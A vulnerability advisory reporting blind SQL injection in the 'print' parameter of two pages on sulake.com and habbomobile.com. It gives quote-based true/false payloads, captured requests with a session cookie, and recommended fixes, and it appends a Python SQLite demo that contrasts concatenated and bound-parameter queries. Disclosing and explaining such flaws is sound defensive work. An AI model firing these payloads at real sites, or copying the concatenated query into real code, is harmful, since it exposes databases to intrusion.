============================================
Habbomobile - SULAKE - Social Network Blind SQL Injection
============================================

I. VULNERABILITY
-------------------------
#Habbomobile.com / sulake.com Blind SQL Injection
#Author: Juan Carlos García
#Affected items:
/careers/
/press/awards/

II. DESCRIPTION
-------------------------
Habbomobile / Sulake (sulake.com, habbomobile.com) is a social entertainment company focused on online social places and games. Its stated goal is to inspire playful interaction and self-expression by creating easy-to-use social online services. Currently these services include the social game and online community Habbo Hotel. The main product of Sulake is Habbo Hotel, which describes itself as the world's largest social game and online community for teenagers; the Habbo online community has customers in 150 countries, and 5 million teenagers visit the different communities every month.

III. PROOF OF CONCEPT
-------------------------
Attack details

1- /careers/
URL-encoded GET input "print" was set to -1' or '3'='3
The captured request below carries the false-branch counterpart of that payload; it URL-decodes to -1' or 4 = '5. A blind injection is confirmed by comparing the response for the always-true condition ('3'='3) with the response for the always-false condition (4 = '5): no database error text is returned, only a visible difference between the two pages.

GET /careers/?print=-1%27%20or%204%20%3d%20%275 HTTP/1.1
Cookie: CONCRETE5=grs072dtvq30fnuk357ier9nq4
Host: www.sulake.com / habbomobile.com

2- /press/awards/
URL-encoded GET input "print" was set to -1" or "3"="3
This is the double-quote variant of the same true/false test, for the case where the parameter lands inside a double-quoted SQL string; the captured request decodes to -1" or 4 = "5.

GET /press/awards/?print=-1%22%20or%204%20%3d%20%225
Cookie: CONCRETE5=grs072dtvq30fnuk357ier9nq4
Host: www.sulake.com / habbomobile.com

IV. BUSINESS IMPACT
-------------------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of the database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible not only to manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries.
In some cases, it may be possible to read from or write to files, or to execute shell commands on the underlying operating system. Certain database servers, such as Microsoft SQL Server, contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

V. SOLUTION
-------------------------
#Sanitize the input
It is absolutely vital to validate user input to ensure that it does not contain content that is dangerous to the SQL server or to the HTML output. One's first idea is to strip out "bad stuff", such as quotes, semicolons or escape characters, but this is a misguided attempt: though it is easy to point out some dangerous characters, it is much harder to point to all of them.

#Escape/quote-safe the input
Escaping is better than a character blacklist, but only when it is done with the database driver's own escaping routine and applied to every value that reaches a query, without exception.

#Use bound parameters (the PREPARE statement)
Though quote-safing is a good mechanism, we are still in the area of "considering user input as SQL", and a much better approach exists: bound parameters, which are supported by essentially all database programming interfaces. The query text with placeholders is sent to the server separately from the values, so a value such as -1' or '3'='3 is only ever compared as a literal string and is never parsed as SQL.

VI. CREDITS
-------------------------
This vulnerability has been discovered by Juan Carlos García (@secnight)

VII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The Author accepts no responsibility for any damage caused by the use or misuse of this information.

VIII. FOLLOW ME
-------------------------
You can follow me (@secnight)
http://www.highsec.es
http://hackingmadrid.blogspot.com
http://blogs.0verl0ad.com
Twitter: @secnight
Facebook: https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn
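Appendix: added example, not part of the original advisory and not code from Sulake or its CMS. It reproduces the true/false differential that section III relies on and the bound-parameter fix that section V recommends, against a constructed in-memory SQLite table standing in for whatever table the "print" parameter selects from on the real site. The table, its rows, the function names and the single-quote payloads are assumptions for illustration; the double-quote variant from /press/awards/ is not modelled because SQLite treats double quotes as identifiers.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the CMS table that the "print" parameter would select from.
SAMPLE_ROWS = [(1, "Careers"), (2, "Awards"), (3, "Press")]

# The two payloads from the proof of concept: the always-true condition quoted in
# the advisory text, and the always-false counterpart decoded from the captured
# request line (GET /careers/?print=-1%27%20or%204%20%3d%20%275).
TRUE_PAYLOAD = "-1' or '3'='3"
FALSE_PAYLOAD = unquote("-1%27%20or%204%20%3d%20%275")   # "-1' or 4 = '5"


def make_db():
    """In-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages (id, title) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, print_param):
    """The injectable pattern: the request value is spliced into the SQL text, so a
    quote in the value closes the literal and everything after it is parsed as SQL.
    The payloads end in an open quote on purpose, to reuse the closing quote here."""
    sql = "SELECT title FROM pages WHERE id = '" + print_param + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, print_param):
    """The fix from section V: a bound parameter. The SQL text is fixed and the value
    travels separately, so it is only ever compared as data, never parsed as SQL."""
    sql = "SELECT title FROM pages WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (print_param,))]


def is_blind_injectable(lookup, conn):
    """Blind SQLi check the way a scanner performs it: no error text is inspected,
    only whether the true and false conditions produce different responses."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("bound parameter", lookup_safe)):
        print(f"{name}: true-branch={fn(db, TRUE_PAYLOAD)} "
              f"false-branch={fn(db, FALSE_PAYLOAD)} "
              f"injectable={is_blind_injectable(fn, db)}")
```

With the concatenated query the true branch returns every row and the false branch returns none, which is exactly the page difference a blind test looks for; with the bound parameter both payloads return nothing, while a legitimate value such as "2" still resolves to its row. The CONCRETE5 session cookie in the requests points to a PHP CMS, where the same fix is a PDO prepared statement with bound values rather than string-built SQL.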